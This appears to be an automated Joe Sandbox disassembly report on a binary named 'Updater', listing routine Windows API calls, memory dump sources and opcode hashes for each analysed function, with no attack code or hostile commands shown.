                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3763101759-0
                                                                                                                                                    • Opcode ID: 9f0cfacc0f433f1aa4cbccaffc886a9185efa49ea2f35bea61efde05b3b062df
                                                                                                                                                    • Instruction ID: f3d418ae97e63eace5c785c12327171b3e65cd4edca0b01fa58dc3bc12c5add3
                                                                                                                                                    • Opcode Fuzzy Hash: 9f0cfacc0f433f1aa4cbccaffc886a9185efa49ea2f35bea61efde05b3b062df
                                                                                                                                                    • Instruction Fuzzy Hash: E421AD71D00218AFDB10AFA8D982BAEB7F8EF55351F1441E9E904AB291D770DE01CBA1
                                                                                                                                                    APIs
                                                                                                                                                    • TranslateAcceleratorW.USER32(01381E48,00000000,?), ref: 00B80422
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B80466
                                                                                                                                                      • Part of subcall function 00B359E7: IsDialogMessageW.USER32(?,?), ref: 00B35A21
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00B8044B
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B80455
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Translate$AcceleratorDialogDispatchPeek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1911789232-0
                                                                                                                                                    • Opcode ID: 79c26cad1d417923fabe9ceaa2050bacf9ffdb3d2888fcdc281235a190604532
                                                                                                                                                    • Instruction ID: ecc789991a20888fe96ca1619a5164f2879a1b1904964460b6889dba947134b2
                                                                                                                                                    • Opcode Fuzzy Hash: 79c26cad1d417923fabe9ceaa2050bacf9ffdb3d2888fcdc281235a190604532
                                                                                                                                                    • Instruction Fuzzy Hash: 0531C4705A42428FDBB1BB74D844BB237F8EF15384F180599D566C36B0EA79948CDB11
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00BB9A33
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B78560,?,?,?,?,?), ref: 00BB9A48
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00BB9A92
                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B78560,?,?,?), ref: 00BB9AC8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                                    • Opcode ID: 712ba1f1dbbcb7bb86fdd47207ee492cd3a07dfbc5fab72938b0b688f11ec11d
                                                                                                                                                    • Instruction ID: 3421ddfdd39eaddd74f1fa235d4e38f9f8d1e7d0a899c68789dc4708e24baf92
                                                                                                                                                    • Opcode Fuzzy Hash: 712ba1f1dbbcb7bb86fdd47207ee492cd3a07dfbc5fab72938b0b688f11ec11d
                                                                                                                                                    • Instruction Fuzzy Hash: 9E215E35600018EFCB258F98C858EFE7BF9FB49710F1441A9FA0957261D7B5AD50DB90
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNEL32(74DF3340,00BBD934,74DF3340), ref: 00B8E0D2
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B8E0E1
                                                                                                                                                    • CreateDirectoryW.KERNEL32(74DF3340,00000000), ref: 00B8E0F0
                                                                                                                                                    • CreateDirectoryW.KERNEL32(74DF3340,00000000,00000000,000000FF,00BBD934), ref: 00B8E14D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                    • Opcode ID: 1455239df5019a1e92d29477585113aafecdb8d88acc89bb31e4ac3adccfceb2
                                                                                                                                                    • Instruction ID: 5a2573fe1046624ac94a5574610f31d5cd1026a436feed53906d3963d72b27ed
                                                                                                                                                    • Opcode Fuzzy Hash: 1455239df5019a1e92d29477585113aafecdb8d88acc89bb31e4ac3adccfceb2
                                                                                                                                                    • Instruction Fuzzy Hash: 912195305083129F8710FF28D8858AB77E8EE59764F104AADF4B9D72B1EB30D946CB52
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00BB3128
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB3142
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB3150
                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BB315E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                    • Opcode ID: 06391c0e6bb2631ed9c7cd9578315813fc850d15e239204dc21f0bb0932ae096
                                                                                                                                                    • Instruction ID: 6749a54824a3d7a7401bda183be0eb428c883ad00d8736004e130834629aa414
                                                                                                                                                    • Opcode Fuzzy Hash: 06391c0e6bb2631ed9c7cd9578315813fc850d15e239204dc21f0bb0932ae096
                                                                                                                                                    • Instruction Fuzzy Hash: 8021C131204511AFD7149B18C845FBA7BD9EF45B24F148298F42A9B292CBB5EE41CB94
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B89C5A: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B887CE,?,000000FF,?,00B89624,00000000,?,0000001C,?,?), ref: 00B89C69
                                                                                                                                                      • Part of subcall function 00B89C5A: lstrcpyW.KERNEL32(00000000,?,?,00B887CE,?,000000FF,?,00B89624,00000000,?,0000001C,?,?,00000000), ref: 00B89C8F
                                                                                                                                                      • Part of subcall function 00B89C5A: lstrcmpiW.KERNEL32(00000000,?,00B887CE,?,000000FF,?,00B89624,00000000,?,0000001C,?,?), ref: 00B89CC0
                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B89624,00000000,?,0000001C,?,?,00000000), ref: 00B887E7
                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00B89624,00000000,?,0000001C,?,?,00000000), ref: 00B8880D
                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B89624,00000000,?,0000001C,?,?,00000000), ref: 00B88848
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                    • String ID: cdecl
                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                    • Opcode ID: 4b47227b73e5fc96a2c44065e5a8f6b0f9000fdbcff28287af3f942d4c63b257
                                                                                                                                                    • Instruction ID: 85dcfc94989d3e73f13110e58668a48b78ae0f5f7007a83f429d58e264d10fda
                                                                                                                                                    • Opcode Fuzzy Hash: 4b47227b73e5fc96a2c44065e5a8f6b0f9000fdbcff28287af3f942d4c63b257
                                                                                                                                                    • Instruction Fuzzy Hash: 4711D33A200342ABCB14AF39C85597A77E9FF45750B90816AF906CB260EF72D901D790
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B82B63
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B82B75
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B82B8B
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B82BA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: dc2c32ab0b213ed44eacc122c17654b7c2eb2f21b120e212a8d79d7c14c53629
                                                                                                                                                    • Instruction ID: d5ce60c3b6414eb9102357f3f1558a178e49c17a0f38de9075a18d713a94f7df
                                                                                                                                                    • Opcode Fuzzy Hash: dc2c32ab0b213ed44eacc122c17654b7c2eb2f21b120e212a8d79d7c14c53629
                                                                                                                                                    • Instruction Fuzzy Hash: F111F77A941218BFEB10AFA5CD85F9DFBB8FB08750F210195EA04B7290DA716E10DB94
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B8F03F
                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00B8F072
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B8F088
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B8F08F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                    • Opcode ID: 9132aec9a98b78f9bff6f05c1c4ce8dc8e2908bbb17b877f7b360ae422c2f0e8
                                                                                                                                                    • Instruction ID: 4dccda3cdddcebd3e0936f646ecc8f96a3f126042c6eccc891af81c1bae8a7fa
                                                                                                                                                    • Opcode Fuzzy Hash: 9132aec9a98b78f9bff6f05c1c4ce8dc8e2908bbb17b877f7b360ae422c2f0e8
                                                                                                                                                    • Instruction Fuzzy Hash: 1D112FB690425A7FC7009FAC9C099BB7FECEB45310F0443A5F814D3291EAB68D00C7A1
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00B34A7B
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00B34A85
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00B34A98
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00B34AA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4037423528-0
                                                                                                                                                    • Opcode ID: 4707e345baf01760927a65fe6134126e5abad64dc8f51f0c640ccb4557f40ee5
                                                                                                                                                    • Instruction ID: e298d5740e698ec8835c44205d2cb9d51e2fdd03cab9605caf67ae6dd3180b4f
                                                                                                                                                    • Opcode Fuzzy Hash: 4707e345baf01760927a65fe6134126e5abad64dc8f51f0c640ccb4557f40ee5
                                                                                                                                                    • Instruction Fuzzy Hash: 8B01F5312C4740AFC3208F74FC0AAD67FA5EB52330F14479AF6AA8E191DB7909418B60
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00B4CE98,00000000,00000004,00000000), ref: 00B4D0B7
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B4D0C3
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B4D0CA
                                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00B4D0E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 173952441-0
                                                                                                                                                    • Opcode ID: 42d20535754c4cec5ebf1eb50d4bdd7a36856b76f6dc984681ee38eed29be94c
                                                                                                                                                    • Instruction ID: ae1ca39cd91570dfd6a3244e0c7eb95d0a47094d1f0e5e508d01f37d82cea1e2
                                                                                                                                                    • Opcode Fuzzy Hash: 42d20535754c4cec5ebf1eb50d4bdd7a36856b76f6dc984681ee38eed29be94c
                                                                                                                                                    • Instruction Fuzzy Hash: D501B5325012047BDB216FA5DC15BAB7BE9EF81731F204399F924972E0DF748A06A6A1
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B8EC33: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B8DCD6,?), ref: 00B8EC50
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00000000,?,00B8F417,?,?,?), ref: 00B8F6F4
                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,?,00B8F417,?,?,?), ref: 00B8F70E
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B8F71B
                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,00B8F417,?,?,?), ref: 00B8F759
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesDirectoryFullNameOperationPathRemove_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3674178553-0
                                                                                                                                                    • Opcode ID: 01d773d88021c96db1526728f9b4c9ead31e477dcbcef8ca11ea81ddc4fb7334
                                                                                                                                                    • Instruction ID: dfcade5d04489187996dc4fba387111202b3c27610398122307333f57d56e7d1
                                                                                                                                                    • Opcode Fuzzy Hash: 01d773d88021c96db1526728f9b4c9ead31e477dcbcef8ca11ea81ddc4fb7334
                                                                                                                                                    • Instruction Fuzzy Hash: D4114C71D0420A8BDF01EFB8D945AED77F9EF09300F1405BAE419D3291EB78D6848B50
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B345AE
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00B345C2
                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B345CC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                    • Opcode ID: 731ab6e64808ce4a20e24f70c8d0ed060d105caba3e6dafa6b1d3496873cc813
                                                                                                                                                    • Instruction ID: 6fff00242e5e4bf38ee5fa16f6c777e0e78805722a67404493a9f9fb15119b74
                                                                                                                                                    • Opcode Fuzzy Hash: 731ab6e64808ce4a20e24f70c8d0ed060d105caba3e6dafa6b1d3496873cc813
                                                                                                                                                    • Instruction Fuzzy Hash: DA11AD72501959BFDF124F949C44EEA7BADFF193A4F150251FA0452060DB75EC60EBA0
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B88339
                                                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B88351
                                                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B88366
                                                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B88384
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1352324309-0
                                                                                                                                                    • Opcode ID: 86eab43c77c3ad9cb2227ae212bd9806a59d7a4670ab2f3180e62bca5b151586
                                                                                                                                                    • Instruction ID: a82bbc46098ee25389f1c10ba1833996be46d8c0584c10498e5e743c54fcd61c
                                                                                                                                                    • Opcode Fuzzy Hash: 86eab43c77c3ad9cb2227ae212bd9806a59d7a4670ab2f3180e62bca5b151586
                                                                                                                                                    • Instruction Fuzzy Hash: 8411A1B1201704AFE720AF54EC48F967BFCEB00B00F5086A9F616D7160EBB4E904DB90
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00B52EF1,?,00000000,00000000,00000000,?,00B53162,00000006,FlsSetValue), ref: 00B52F7C
                                                                                                                                                    • GetLastError.KERNEL32(?,00B52EF1,?,00000000,00000000,00000000,?,00B53162,00000006,FlsSetValue,00BC311C,00BC3124,00000000,00000364,?,00B52D1D), ref: 00B52F88
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B52EF1,?,00000000,00000000,00000000,?,00B53162,00000006,FlsSetValue,00BC311C,00BC3124,00000000), ref: 00B52F96
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                    • Opcode ID: 19165a0bc1e49dbcf0294c4bca472eee35708a78278a402bc5211b046b2165e2
                                                                                                                                                    • Instruction ID: 8132b388c61a3a456813d0c659993df2e0b64bcb0a0d938496dfeb7c073bc082
                                                                                                                                                    • Opcode Fuzzy Hash: 19165a0bc1e49dbcf0294c4bca472eee35708a78278a402bc5211b046b2165e2
                                                                                                                                                    • Instruction Fuzzy Hash: 9B018832616326ABD7214B79FC44B5677E8EF4676271107A4FD05E7140DB25DC05C6E0
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00BB87ED
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00BB8805
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00BB8829
                                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BB8844
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
